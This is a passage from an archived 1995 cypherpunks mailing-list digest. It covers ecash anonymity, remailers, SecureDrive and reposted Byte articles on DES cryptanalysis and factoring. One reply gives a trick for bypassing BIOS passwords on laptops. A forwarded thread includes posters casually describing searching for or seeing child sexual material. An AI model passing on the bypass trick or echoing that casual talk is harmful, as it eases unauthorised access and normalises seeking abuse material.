of this particular community wants to bud off, or fission, or spore, or
whatever this particular meme does to reproduce, in order to change its
name to something reputable, they're welcome to.

Frankly, I find it entertaining to phone up the local internet-hysterical
talkshow host's call screener and say, "I'm a cypherpunk, and I disagree
with the host". It gets me to the head of the line, even if the innumerate
technophobe who's managing the queue couldn't spell "cypher" if he/she/its
life depended on it...

So long, and you're welcome for all the fish.

Can we get back to c-coding and dissolving reality as we know it, now?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Sep 95 15:53:00 PDT
To: owner-cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <9509152251.AA09314@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


What's in a name?  That which we call a rose would by any other name
still smell as sweet.

Surely, right now, there are more important things to work on.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 15 Sep 95 15:53:30 PDT
To: Rich Salz <rishab@infinity.c2.org
Subject: Re:  "Use implies consent to monitoring"
Message-ID: <v02120d01ac7fb3fd1eab@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:08 PM 9/15/95, Rich Salz wrote:
>`h
>>   Please be advised that use constitutes consent to monitoring
>
>Use of what?

Uh, it looks like the .com registration to me...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Fri, 15 Sep 95 20:03:14 PDT
To: cypherpunks@toad.com
Subject: Quantum computing info?
Message-ID: <199509160259.TAA03727@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Could anyone point me to information on 'quantum' computing?
-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl L. Barrus" <klbarrus@infocom.net>
Date: Fri, 15 Sep 95 19:20:13 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: Explaining Zero Knowledge to your children
Message-ID: <199509160221.VAA29670@infocom.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:18 PM 9/14/95 +0200, you wrote:
>There is a paper about explaining Zero Knowledge methods in simple
>words. It's titled "Explainig Zero Knowledge Authentication to your
>children" or something similar.

I think you are refering to Quisquater's (sp?) explanation, which is in
terms of Ali Baba and a magic cave.  A functionally similar explanation is
in Schneier's Applied Crypto, pp. 85-86.

--
Karl L. Barrus <klbarrus@infocom.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 21:27:23 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <ac8001d8060210044a5e@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:46 AM 9/15/95, Timothy C. May wrote:
>At 8:47 AM 9/15/95, Donald M. Kitchen wrote:
>>-----BEGIN PGP SIGNED MESSAGE-----
>>
>>Excellent discussion on the subject, actually. However, your idea of
>>the "first person to the bank" maintaining anonymity via remailer block
>>is flawed. First of all, if a collusion with the bank is being taken into
>>account, presumably sufficient enough resources are involved that someone
>>may try and track the reply block. Mixmaster (as your messages mentioned
>>by name) would be necessary to eliminate the chance of tracking the block
>>through combinations of replay attacks etc. (Which reminds me, has anyone
>
>Just to clarify a minor point, I mentioned "mixes," not Mixmaster. I have
>nothing against Mixmaster, but "mix" is the term Chaum invented for what we
>later started to call a "remailer."
>
>--Tim May
>

Indeed Chaum's phrase "digital mix" was the inspiration for the name Mixmaster.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 15 Sep 95 18:41:07 PDT
To: mix-l@jpunix.com
Subject: Re: Commercial Mixmaster (was Re: Mixmaster status)
In-Reply-To: <9509151948.AA27938@cs.umass.edu>
Message-ID: <m0stmFJ-000H93C@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 15 Sep 1995 15:48:14 -0400 (EDT)
   From: futplex@pseudonym.com (Futplex)

   Lance Cottrell writes:
   > 4) There will always be a free version of the client with source code.

   Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do,
   I suspect he may not have much legal leeway in this regard.

There *will* always be a free version of the client with source code,
but the proprietary improvements will probably not be merged into the
free version.  Lance, and only Lance, as copyright holder, has the
publish the code under a different copyright.  It's the same thing
that Phil Z. did with ViacryptPGP.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | America neither a Christian,
Potsdam, NY 13676 |  Jewish, Islamic, nor atheist (etc&) nation.  This is good.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 15 Sep 95 21:50:58 PDT
To: wilcoxb@nagina.cs.colorado.edu (Bryce Wilcox)
Subject: Re: Why ecash is traceable
In-Reply-To: <199509160435.WAA26877@nagina.cs.colorado.edu>
Message-ID: <199509160445.VAA13597@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	This looks as though you are simulating the
'deposit-and-get-coinage-back' within a
'deposit-and-have-account-credited' system.

	I figure that they would make the transaction cost involved in
creating an account sufficiently high that this plan would be
defeated-- or they wouldn't allow psuedonymous accounts.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 15 Sep 95 19:25:22 PDT
To: cypherpunks@toad.com
Subject: Washington D.C. Cyperhpunks Meeting Cybercast
Message-ID: <Pine.SUN.3.91.950915222240.9860A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Catch the WashDC Cypherpunks meeting cybercast on CU-SeeMe tommorow, 
saturday Sept. 16 starting at 3:00 PM on the www.digex.net 
(205.197.247.33) reflector.

CU-SeeMe software is videconferencing for PCs and Macs and can be found 
at ftp.gated.cornell.edu

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 15 Sep 95 21:35:39 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Why ecash is traceable
In-Reply-To: <199509150532.WAA08865@jobe.shell.portal.com>
Message-ID: <199509160435.WAA26877@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hal <hfinney@shell.portal.com> wrote:
>
> But this correlation is what makes the coin traceable.  Suppose Alice is 
> paying a coin to Bob via an anonymous network, and she and the bank 
> are going to try to figure out who he really is.  She goes through the 
> payment transaction, and Bob sends his resulting data to the bank.  
> Before doing so, though, Alice simulates a payment of the same coin to 
> Charlie.  Charlie doesn't actually have to be involved, Alice can just 
> go through what she would have done if she had spent the coin elsewhere.  
> The result of this simulated payment has been shared with the bank.
> 
> Now, when Bob deposits his data, the bank compares it with the data 
> Alice sent, the result of her simulated spending of the same coin.  By 
> the argument presented above, Bob's deposit will be flagged.  It will 
> correlate with the data Alice sent in since this will be the equivalent 
> of a double-spending.  So when Bob makes the deposit he can be linked to 
> the specific coin payment which Alice made, and his anonymity is lost.


So Alice/TheBank are able to tell that the nym whom Alice gave the coin to
is the same as the nym who deposited it.  If Bob has a pseudonymous
account at the bank, and it was the same pseudonymous account that he used in
the transaction with Alice, then they haven't learned anything new, but if he
wants to use one pseudonym when dealing with Alice and another to deposit the
coin he got from her then he has problems.


That's the extent of the damage, right?  Seems like it can be prevented by
laundering the coin through a single pseudonym first.  That is:  Bob receives
the coin from Alice, calling himself "CyberBob".  He deposits the coin with
the bank as a one-time-nym "Nym#2837004", then he has that nym withdraw the 
same amount of money from its account (closing out the account) and transfers
it to the nym which will actually keep the money, "NormalBob".  He destroys 
the new blinding factors after the temporary nym has withdrawn the coin, 
he deposits the coin with the bank as "NormalBob", and now he is in the clear.


Am I missing anything?


If Bob's transaction with Alice was actually pseudonymous rather than
anonymous then he can just deposit the coin using the same pseudonym and they
haven't learned anything new.  Once he has done that he can safely transfer
the money to any other nym of his with no risk (except for traffic analysis,
physical surveillance, yadda yadda yadda).


So current (DigiCash "ecash") Chaumian protocol leads to complete 
anonymity/pseudonymity (there oughta be a word for that.  
"self-nym-control"?) in the case that pseudonymous accounts are allowed at
the Bank.


Now one could move this "double-blinding" (isn't that phrase already in 
use?) trick into the cash protocol itself, possibly gaining a performance 
win.  DigiCash is apparently aware of this possibility, but (rightly) 
doesn't consider it important to develop right now.


Regards,

Bryce

signatures follow:


                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

iQCVAwUBMFpTOfWZSllhfG25AQHndAQAuOfz4Fohl3e/4Q3eUKKY2nZNG+TdDQEN
FvW1q1KAuGTeGJoNmL6qD4xkV1wXuT7UScN/7BwU+8SsIh3B5Cb834saGsCTjNtb
8EV2zsYqzdJkJ3DuDHQw785gqrNPokug4KPP4LRMt5N+PnPRTAWnq6PRibegsg86
ypFcUOVbLTU=
=K+5k
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 15 Sep 95 21:51:32 PDT
To: wilcoxb@nagina.cs.colorado.edu
Subject: Re: Why ecash is traceable
Message-ID: <199509160450.WAA13662@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Re: ecash being non-tracable if anon accounts are allowed...
 
And if not, a market will probably develop to launder ecash.
 
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 15 Sep 95 21:52:18 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Bad sig from Cypherpunk auto-signer Re: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <199509150006.UAA17827@book.hks.net>
Message-ID: <199509160452.WAA27949@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hm.  Observe the bad signature from the "Cypherpunk signing agent".  Sorry if
I should have limited this to Lucky and the auto-signer, but I thought y'all
might be interested in this as either an attack or false positive.  (My bet
is on the false positive, of course.)


Bryce, signatures at end


P.S.  I have seen no kiddie porn of any type on the Net.  Oh wait, I saw some
once that advertised itself as "young girls" performing fellatio, but they
looked to be adults as far as I could tell.

P.P.S.  I wonder if a "pedaphile" would be a teacher fetishist?  And a
"pedephile"-- for feet?


- -----BEGIN PGP SIGNED MESSAGE-----

In article <9509141640.AA30602@zorch.w3.org>, hallam@w3.org wrote:


>We never used to see kiddie porn on the internet. The net would go
balistic if a 
>picture of a teen age nude was posted. Recently there has been a flood of ha
    > rd 
>core paedophile material.

There has always been nude teens on the net. The kind of pictures the most
casual observer can take at any Mediteranian beach at any given day in the
Summer. There is no real kiddy porn readily available on the net.  I
looked long and hard. Its a red herring.

ANYBODY on this list seen some real kiddy porn on the net? I am talking
intercourse, etc., not scans of six year olds from the Sears catalog, or
naked boys building sandcastles on the beach.

- - -- 
- - -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- - ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjDkioZzwIn1bdtAQEB0gF+M67Ih6WLAl8J9bxPZOBmyjxKsxUczpqv
th5x7ZuILyuf/+bFTtcLKwbOnzZkIfpJ
=pjLL
- -----END PGP SIGNATURE-----

signatures follow:


                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

iQCVAwUBMFpXdfWZSllhfG25AQFDYQQAuC01Z3tVy9Eu8GIWl850AqxTcPES3yGN
TqSZ7vT5VRVKyzJCE4Jpaosx7ndaeDnD6DkCPY6AxSeMDmN+lkKT2RZT76H0Mvvx
All9WAyetrB9p7QRAk5hxdHIantRi+z3F8akQR8SN7IVmh/QSWJMk0rKJqLtcbyQ
inF14sTWjgk=
=clgc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Sep 95 23:45:55 PDT
To: cypherpunks@toad.com
Subject: Re: laptop passwords
Message-ID: <199509160645.XAA29809@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 PM 9/15/95 -0800, you wrote:
>I've got a dilema.
>        2 laptops that I just purchased at a police auction have passwords,
>from what I can tell they are passworded at the cmos level. I would normaly
>just pull out the battery and clear the cmos but these are laptops and I'm
>not to comfortable about doing that.  Any ideas?
>
>laptop1 -  Toshiba Satelite Pro T2400CT
>laptop2 -  Epson Action Note 500 c

I am not familiar with those models, but if they work like a regular AMI
bios, try hitting ctrl-alt-delete at the password prompt.  On many
passworded bios it will get you right past it.  That will at least give you
enough info to see if there is anything worth saving.  (I have no problem
giving out that trick since I have found most bios passwords pretty useless
unless used against the most clueless of users.)

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Sep 95 23:57:36 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <199509160657.XAA02345@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:28 PM 9/15/95 +5, you wrote:

>Another  way is to place the document in a PItA proprietary graphical
>format for transport and viewing only, stego identifier imbedded if
>you chose * , so that every portion of the document has some
>indentifier imbedded in it. Many obvious and many devious. Electronic
>drawings with a harmless and useless circuit(s) added on , software
>with do nothing code (by design!:) ).  Difficult and time consuming
>to do, but for megabuck items, no prob. Automated for an additional
>fee of course. Start a service industry for such, make money, pay me
>back by running a fast, reliable remailer.

I seem to remember a software piracy case from a number of years back.  The
case was settled by Apple showing that their code had been copied by the
copyright "easteregg" hidden in the roms.  Made for a quick and effective
demonstration in court.  (The story may be apocryphal, but it makes for an
example as to how such things do have a (supposed) valid use in protecting
code from being snagged by  other companies.)

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 15 Sep 95 23:28:12 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: e$: Progress and Freedom Conference this Summer
In-Reply-To: <v02120d06ac79f1eb4cbd@[199.0.65.105]>
Message-ID: <199509160628.AAA02261@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Also check out Progress & Freedom Foundation's WWW site.  

http://www.pff.org/


This is Newt Gingrich's organization by the way in case anyone didn't know
that.


Bryce, signatures at end

 rah@shipwright.com (Robert Hettinga) wrote:
>
> There was a pointer here to an article in the NYT or WSJ about the
> conference this summer of the Progress and Freedom Foundation, with muchos
> net.luminarios (Huber, Myhrvold, Barlow, Brand, Kelly, Dyson, Keyworth,
> etc.) in attendence. Topics were mostly about e$ and the
> causes/consequences thereof.
> 
> I just saw this thing on CSPAN, and I thought it was way cool. Here's how
> to get it from CSPAN in case they don't run it again.
> 
> Ask for Tape number 57759-63
> CSPAN prices their tapes by the hour, at $35/hr. This tape is $105.00
> 
> 
> CSPAN
> Department 53
> Washington, DC 20055
> 
> In case I botched something above, or you want to put this on your favorite
> book-entry transaction account ;-), CSPAN's phone number is 202-737-3220



signatures follow:


                                    +                                        
      public key on keyservers      /.      island Life in a chaos sea       
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu    
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

iQCVAwUBMFpuW/WZSllhfG25AQEDCAQAgyG5dc4do3mer1SlremULsoyJEgq9IZe
1ICplfjoMu3mYaSX9PCkcWgoXg3FtqSf3KN6mRZiGwp0CBk1lrSC/YBzOZfG/6gJ
7QmUv2HlDVbmE/O7vX+SjXd1iNlUoymGsiKxZk/TRAZUibb/s2CHYnrGm4mxe4y6
/RBeygqWVP8=
=81iV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 15 Sep 95 21:57:41 PDT
To: cypherpunks@toad.com
Subject: Re: Quantum computing info?
In-Reply-To: <199509160259.TAA03727@goblin.punk.net>
Message-ID: <43dlf6$d07@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509160259.TAA03727@goblin.punk.net>,
Jeff Simmons  <jsimmons@goblin.punk.net> wrote:
>Could anyone point me to information on 'quantum' computing?

Try http://vesta.physics.ucla.edu/~smolin/index.html.

   - Ian "hoping this new mail2news gateway works in reverse as well"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Sat, 16 Sep 95 03:19:14 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive News - Win95 yes, Iomega zip drive no
Message-ID: <BRLiBD8w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

SecureDrive Users,

I have seen inquires here and received direct e-mail enquirinq about
SecureDrive and WIN95, and the Iomega zip disk.

I have recently heard from users that SecureDrive 1.3d does work on
Windows 95, although it does force it into "DOS Compatibility Mode",
which is a performance hit on disk access.  I've also heard that LOGIN
does not work from a WIN95 DOS window, so has to be issued outside of
Windows.

I haven't heard anything specific about SecureDrive 1.4, but I believe
it should work the same as 1.3d on WIN95.

I'm sorry to report that SecureDrive does not support the Iomega ZIP
drive.  I believe that's because the TSR driver supplied with the
hardware does not support a DiskBIOS interface.

I had thought that Secure Device, another real-time encryption system,
would support this drive, since it works through a device driver
mapped to a dos file.  But an actual trial proved otherwise.  The
problem is that the DOS file must be present when the CONFIG.SYS
DEVICE= statement for the SECDEV.SYS is processed. But the zip drive
driver is a TSR that doesn't get loaded until after all DEVICE
statements have been processed.  There's no particular reason that
Iomega couldn't have written their driver as an MSDOS device driver
rather than a TSR, in which case SecureDevice would probably work, but
they didn't, so it doesn't.

Hope this info is helpful.  If any of you discover any interesting new
facts using SecureDrive, please let me know.

Edgar W. Swank   <edgar@HighNRG.sbay.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFirU94nNf3ah8DHAQEEHAQAg4IB1XDQdFIxHto1iTPpORjuubUdhRzD
t8MT350E0KZVCMSj+Vh4y4wEPw2dmms/QY1iMxuwVV/lja+l9yHaRPuxpi5EjQdv
Mi8Sk73M/gcL35TTjUli5dnjzHsJ6uYt5Q51j7s0EspJ1qprQlSlgmNvvOTqDgyf
/he5BfEfAU4=
=GXYT
-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 15 Sep 95 18:07:38 PDT
To: cypherpunks@toad.com
Subject: Picking the Crypto Locks
Message-ID: <199509160107.DAA03893@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Byte, October, 1995, pp. 77, 80.


Picking the Crypto Locks

A new technique called differential cryptanalysis can
break even DES quickly

By Peter Wayner


How secure is your encrypted data? Advances in
mathematics and increased computing power mean you need
longer keys and stronger algorithms if you still want to
keep your secrets. Both private-key encryption (which
uses a single key for coding and decoding) and public-key
systems (which use separate keys for encryption and
decryption) are increasingly vulnerable to determined
attack. But do these weaknesses represent a real threat
to encrypted data, or are they still just intriguing
research results?

Unfortunately, when we try to assess the effectiveness of
today's popular cryptographic systems, we run into a
problem of mathematical ignorance. Most people who are
familiar with mathematics can work in two directions,
forward and backward, like the simple algebraic equation
a = b + 1. We can determine the value of the first
variable from that of the second and vice versa. Crypto
systems, however, generally rely on mathematics that
works only in one direction. People assume these systems
are secure because no one has yet shown how to work the
mathematics backward and break open the message. In
general, we determine the strength of most cryptographic
systems by seeing how well they avoid the attacks we know
have been used on other systems. If none of the past
attacks seems to work, then we deem a system secure. For
now.

Let's look at how today's codebreakers work, the
resources and time they need, and what we require in the
way of new systems and longer keys. Recent assessments of
the strength of private-key crypto systems involve
looking for theoretical holes and measuring the time
needed for a brute-force attack. Finding the holes can be
devilishly hard, calling for deep mathematical insights.
Brute-force attacks are easier to mount if enough
computational hardware is available, but they're also
easy to defend against.

The most important development in the realm of data
encryption in recent years is Eli Biham and Adi Shamir's
differential cryptanalysis. They showed how to mount a
limited attack on today's most widely used cryptosystem,
DES (the federal Data Encryption Standard), which is also
the basis for Unix's password system.

Imagine that you had access to your victim's DES cipher
"box" (the common term for an enciphering system) with
preloaded keys. Your goal is to determine the 56-bit key,
so that you can decrypt the other messages your victim
had encrypted with the box. Biham and Shamir showed that
you could infer the hidden key if you could pass 247
messages through the box and observe what came out. This
chosen plaintext attack builds up a statistical model of
the cipher, and it needs this many plaintexts to produce
an answer with confidence.

Most intriguing, this work exposed flaws in many DES
substitutes. Because the U.S. government classified the
details behind DES's design, many assumed that there
might be a trapdoor through which the government could
eavesdrop. To circumvent these potential trapdoors, some
folks designed their own variations of DES. Most of these
new ciphers, however, fall even faster to Biham and
Shamir's mathematical machinery. FEAL-4, a faster
replacement, for example, takes only four well-chosen
plaintexts.

_______________________________________________________

Strengths and Weakness of Crypto Algorithms
_______________________________________________________

Algorithm      Comment      Strengths     Weaknesses
_______________________________________________________

DES            Standard,    Long-tested   Has yielded
               Widely                     to DC
               Accepted
_______________________________________________________

FEAL-4         DES                        Easily broken
               substitute                 by DC
_______________________________________________________

GDES,          DES-like                   Easily broken
New DES                                   by DC
_______________________________________________________

Khufu          DES-like     Secure        New, unknown
                                          against DC
_______________________________________________________

Blowfish       DES-like     Secure        New, unknown
                                          against DC
_______________________________________________________

RC-4           Proprietary  Variable-     Unknown
                            length key
_______________________________________________________

RSA            Widely used  Long-tested   Vulnerable to
Public Key                                advances in
                                          factoring  
_______________________________________________________

Skipjack       Classified   Considered    Algorithm must
                            strong        remain secret
                                          to preserve
                                          law-enforcement
                                          trapdoor
_______________________________________________________

DC = differential cryptanalysis
_______________________________________________________


Recently, the IBM scientists who originally designed DES
revealed that they anticipated Biham and Shamir's attack
and optimized DES to resist it. Because other
nongovernment cryptographers didn't know about this
attack, they couldn't design their software to resist it.
Now the information is public, and there are new ciphers
that hold up well against these attacks. Ralph Merkle's
Khufu and Bruce Schneier's Blowfish are two private-key
ciphers that are similar to DES but resist differential
cryptography. They do this by creating new S-boxes for
each encryption, using the key to randomize them.
(S-boxes are the essential scrambling elements of
DES-like ciphers. Think of them as lookup tables or
nonlinear functions; their outputs should be as random as
possible.) Differential cryptanalysis works only if the
attacker knows what's in the S-boxes.

This work also revealed some stunning counterintuitive
results. Key length is usually taken as a rough measure
of a system's security. DES uses 56-bit keys; a
brute-force attacker might need to try all 2^56 keys to
find the right one. A longer key would mean a longer
brute-force attack. However, Biham and Shamir showed that
even if DES used longer keys, it would hardly be any
stronger against differential cryptanalysis. The
statistical model would still be solvable if DES used the
maximum of 768 bits.

Applying this knowledge to other types of ciphers is
tricky. RSA Data Security markets a proprietary algorithm
called RC-4 that accepts a variable-length key; this
algorithm is used in many products. The flexible key
length can be an advantage in some situations. For
example, the government allows general export of software
using RC-4 with a 40-bit key, but similar software using
a longer key must stay within the U.S. While we don't
know if differential cryptanalysis can be applied to RC-4
directly, because of the algorithm's proprietary nature,
the results with DES suggest that more key is not
necessarily stronger.

Men and Machines

Mathematical tools like differential cryptanalysis can be
the most powerful attack against a cipher system.
Brute-force attacks are normally a last resort, rare in
practice because cipher designers routinely use long key
lengths specifically to preclude them. But times are
changing. We're reaching a point at which a large machine
can quickly search the entire keyspace of DES. DES is
still in wide use; it' s been the commercial and
governmental standard for nearly two decades. Replacing
such standards can be a painfully slow process.

DES users should be thinking about what can be done with
off-the-shelf hardware.

Brute-force attacks simply use large machines that try
all possible passwords in parallel. It's even possible to
produce native chips that run DES. Michael Wiener of Bell
Northern Research described how to build a $1 million
machine using a pipelined DES processor that could cruise
through all possible keys in about 7 hours.

Massively parallel machines can also attack the problem.
Some of the most promismg emergmg machines distribute
small, 1-bit processors directly onto the memory chips.
Some have 1024 processors on a chip with 42 bits of
memory per processor. (Before it entered Chapter 11, Cray
Computer was building for the National Security Agency a
special Cray 3 with such processor-embedded memory.) In
1992 I designed a machine using 1 million associative
processor memory chips (standard DRAM densihes) from
Coherent Research (Syracuse, NY) that could attack all of
DES in one day. This machine could be reprogrammed to
attack other DES-like ciphers. Linden Technology (Austin,
TX) is currently exploring manufacturing new 4-Mb DRAMs
with the 1024 associative processors built onto the chip.

The effect of brute-force attacks on DES is also
important for Unix security, which stores each password
after passing it through DES 25 times. At log-in, you
type your password; it's encrypted 25 times and the
result compared against the password file. If it matches,
the system grants you access. Because the password file
doesn't contain the passwords themselves, unauthorized
users can't use the file to recover them directly. They
must use a brute-force machine. However, the brute-force
attack can be relatively successful against Unix, because
the keyspace is smaller. Most users limit their passwords
to alphabetic characters, occasionally adding numbers.
This makes searching for passwords much faster; it could
be done quite quickly with an associative-memory parallel
processor. One estimate suggests that a computer using
512 of Linden's chips could test all six-character
alphanumeric passwords in 15 minutes. Clearly. the Unix
password structure needs to be rethought in light of
today's machines and code-breaking techniques.

Because of this new vulnerability, you may want to
explore other, newer ciphers. such as Merkle's Khufu or
Schneier's Blowfish. The classified Skipjack algorithm
buried inside the U.S. government's Clipper and Capstone
encryption chips also uses S-boxes, but little is known
about their design. There's little reliable public
information about RSA Data Security's RC-4. Anyone who
uses these algorithms must be prepared to trust the wits
of the designers, because the algorithms have not
undergone the intensely thorough and long-time public
scrutiny given to DES.

Many organizations have opted to continue with DES, but
the current state of the art is triple-DES -- three
passes of the algorithm with either 112- or 168-bit keys.
This effectively guards against both brute-force and
differential analysis attacks. These users can rest
assured that, paradoxically, all the attacks focused on
DES continues to keep it strong.

-----

Peter Wayner is a BYTE consulting editor living in
Baltimore, MD. You can reach him on the Internet at
pcw@access.digex.net, on BIX as pwayner@bix.com, or on
the World Wide Web at http://access.digex.net/~pcw/
pcwpage.html.

-----


Byte, October, 1995, p. 78.


Factoring in Public-Key's Future

Long thought nearly unbreakable, public-key cryptogratphy
is yielding to attack. The secret of security here is key
length.

By Bruce Schneier


Factoring large numbers is hard but not as hard as it
used to be. This has grave implications for the
effectiveness of public key cryptocraphy, which relies on
the difficulty of factoring long keys for its security.
But how long is long enough'?

In 1976, Richard Guy wrote: "I shall be surprised if
anyone regularly factors numbers of size 10^80 without
special form during the present century." In 1977, Ron
Rivest said that factoring a 125-digit number would take
40 quadrillion years. In 1994, a 129-digit number was
factored. The lesson here is that making predictions is
foolish.

Today, 512-bit keys are common. Factoring them, thus
destroying their security, is well within the range of
possibility for today's computing resources. A weekend-
long worm on the Internet could do it.

Computing power is measured in MIPS-years: a
million-instructions-per-second computer running for one
year, or about 3 x 10^13 instructions. A 100-MHz Pentium
is about a 50-MIPS machine; a 1600-node Intel Paragon is
about 50,000 MIPS.

In 1983, a Cray X-MP supercomputer factored a 71-digit
number in 0.1 MIPS-years, using 9.5 CPU hours. That's
expensive. Factoring the 129-digit number in 1994
required 5000 MlPS-years and used the idle time on 1600
computers around the world over an eight-month period.
Although it took longer, it was essentially free.

